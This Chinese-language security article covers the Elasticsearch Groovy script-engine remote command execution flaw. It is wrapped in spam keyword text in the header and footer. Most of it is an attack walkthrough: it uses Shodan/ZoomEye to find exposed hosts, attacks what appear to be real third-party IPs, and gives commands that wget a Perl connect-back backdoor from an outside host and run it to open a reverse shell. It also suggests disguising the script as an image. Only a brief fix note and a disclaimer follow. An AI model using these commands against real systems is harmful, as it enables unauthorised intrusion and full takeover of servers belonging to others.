成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

ElasticSearch命令執行漏洞:通過perl進行反彈shell

原創
安全 漏洞
目前網絡公開部署Elasticsearch大概有數萬臺服務器,內部網絡部署就不計其數了。Elasticsearch用了兩個危險性的腳本MVEL和Groovy。2014年5月MVEL爆出來命令執行漏洞,這次輪到Groovy了,Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 的Groovy 腳本引擎存在漏洞。這個漏洞允許攻擊者構造Groovy腳本繞過沙箱檢查執行shell命令,已修復的版本是Elasticsearch 1.3.8 和 1.4.3。

ElasticSearch是一個基于Lucene的搜索服務器。它提供了一個分布式多用戶能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java開發的,并作為Apache許可條款下的開放源碼發布,是第二最流行的企業搜索引擎。設計用于云計算中,能夠達到實時搜索,穩定,可靠,快速,安裝使用方便。目前網絡公開部署Elasticsearch大概有數萬臺服務器,內部網絡部署就不計其數了。Elasticsearch用了兩個危險性的腳本MVEL和Groovy。2014年5月MVEL爆出來命令執行漏洞,這次輪到Groovy了,Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 的Groovy 腳本引擎存在漏洞。這個漏洞允許攻擊者構造Groovy腳本繞過沙箱檢查執行shell命令,已修復的版本是Elasticsearch 1.3.8 和 1.4.3。 這個漏洞不亞于Java Struct執行命令漏洞,對與Linux和Windows平臺都適用,在實際測試中也有授權為最高權限root或者system權限的,可以獲取webshell和最高系統權限。

受影響版本:

cpe:/a:elasticsearch:elasticsearch:1.4.2

cpe:/a:elasticsearch:elasticsearch:1.4.0

cpe:/a:elasticsearch:elasticsearch:1.3.7

cpe:/a:elasticsearch:elasticsearch:1.4.0:beta1

cpe:/a:elasticsearch:elasticsearch:1.4.1

(一)可利用POC

目標地址http://www.antian365.com:9200/_search?pretty

POST提交以下數據

(二)perl可利用poc代碼

將以下代碼保存為ElasticSearch.py,執行python ElasticSearch.py http://www.antian365.com:9200/ " cat /etc/issue " 即可執行命令。需要執行其它命令替換“cat /etc/issue”命令即可。

 

(三)通過perl腳本利用該0day獲取權限思路

需要在公網IP準備一個pl的反彈腳本,例如back.pl,可以將腳本文件偽裝為jpg文件上傳到網站然后下載。例如www.antian365.com/lab/linux0day/back.pl.txt。然后依次執行以下命令即可。

通過perl腳本利用該0day獲取權限思路

說明:

(1)www.antian365.com為被攻擊目標的IP或者域名,IP地址123.123.123.123為公網獨立IP,80端口為該服務器未開放端口。

(2)有部分服務器由于未安裝perl環境,因此有可能執行命令失敗。

(四)實戰案例

(1)搜索目標對象

通過http://www.zoomeye.org/或者shodanhq.com搜索“ElasticSearch”關鍵詞,直接訪問網站地址http://www.zoomeye.org/search?q=ElasticSearch&t=host即可獲取結果。在該結果中可以看到各個國家使用該軟件的分布情況。隨機選擇一個IP進行,本例選擇第一個IP地址http://192.241.225.207/,同時單擊IP地址右上角的一個小圖框連接地址,例如打開地址http://192.241.225.207:9200/進行訪問,確認該IP地址是否存活。

圖1 搜索目標對象

圖1 搜索目標對象

(2)執行命令

直接執行python ElasticSearch.py http:// 192.241.225.207/ "/usr/bin/wget www.antian365.com/lab/linux0day/back.pl.txt -O /tmp/back.pl" 命令,但反饋結果為“HTTP Error 500: Internal Server Error”,如圖2所示。

再次使用FireFox便攜版本進行測試,輸入目標地址http://192.241.225.207:9200/_search?pretty,在Post data中輸入

ElasticSearch命令執行漏洞:通過perl進行反彈shell

其結果顯示如圖3所示,表明該漏洞已經修復或者不可用。

執行命令

圖2執行命令

再次測試漏洞是否可用

圖3再次測試漏洞是否可用

通過測試多個搜索結果,找到一個還存在漏洞的IP地址,在0day出來的第一時間基本每個目標都能執行,每多一分鐘就減少一個,直接執行以下代碼,成功運行,無任何結果顯示,表明文件下載到服務本地成功。

python ElasticSearch.py http://192.241.222.xxx:9200/ "/usr/bin/wget www.antian365.com/lab/linux0day/back.pl.txt -O /tmp/back.pl"

執行以下命令,成功后會顯示“Perl Connect-back Backdoor、Auther:Maple-x”表明shell執行成功,如圖4所示。

python ElasticSearch.py http:// 192.241.222.xxx:9200/ "/usr/bin/perl /tmp/back.pl 124.123.122.11 80"

在本地監聽端口過幾秒種就會反彈shell回來,執行ifconfig命令,如圖5所示,確認反彈shell成功,后續操作就任由入侵者發揮了!

 

反彈shell命令成功

圖4反彈shell命令成功

 

反彈shell命令成功

圖5成功獲取shell

(五)修復方法

建議用戶更新到最新版本。當然如果不想升級版本也可以通過修改elasticseach.yml的script.groovy.sandbox.enabled 為false就行了。

注:請勿用于非法用途,僅供安全人員漏洞研究之用

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2015-03-09 10:22:23

2010-11-02 21:17:17

2015-03-06 15:31:01

2017-09-04 16:20:38

Linuxshell命令

2009-07-19 10:48:53

LinuxWebShell反彈CmdLine She

2023-02-27 07:37:56

Curl操作SQL

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2010-07-21 14:08:28

Perl命令行

2014-09-26 15:41:51

2020-10-16 09:42:22

漏洞

2015-09-20 20:13:55

2015-01-12 11:05:40

路由器漏洞華碩路由器

2022-05-07 11:31:25

漏洞網絡攻擊

2024-05-17 12:48:58

2023-07-17 08:21:52

漏洞版本項目

2013-12-20 10:36:56

2014-08-06 11:24:24

Elasticsear劫持掛馬

2016-11-08 19:56:09

GitLab漏洞遠程命令

2017-01-19 20:56:14

2010-07-15 09:37:47

Perl命令行
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 欧美视频第二页 | 欧美在线观看一区 | 久久久久久国产精品 | 久久久xxx | 九色视频网 | 九九热在线精品视频 | 一区二区欧美在线 | 成人亚洲| 一区在线视频 | 午夜网 | 亚洲天堂二区 | www九色| av在线一区二区三区 | 成人av免费播放 | 欧美日韩国产一区二区 | 久久国产福利 | 狠狠色香婷婷久久亚洲精品 | 欧美炮房 | 成人不卡在线 | h片在线观看免费 | 亚洲精品亚洲人成人网 | 澳门永久av免费网站 | 久久久精品久 | 狠狠做深爱婷婷综合一区 | 午夜影院在线观看视频 | 日本在线免费看最新的电影 | 人人干人人艹 | 欧美激情精品久久久久久变态 | 久久最新 | 成人国产精品久久久 | www.国产一区 | 日韩www| 国产成人99久久亚洲综合精品 | av中文在线播放 | 国产精品色哟哟网站 | 91xxx在线观看 | 久久国产一区二区 | 亚洲精品日韩一区二区电影 | 91久久夜色 | 在线视频中文字幕 | 91精品国产91 |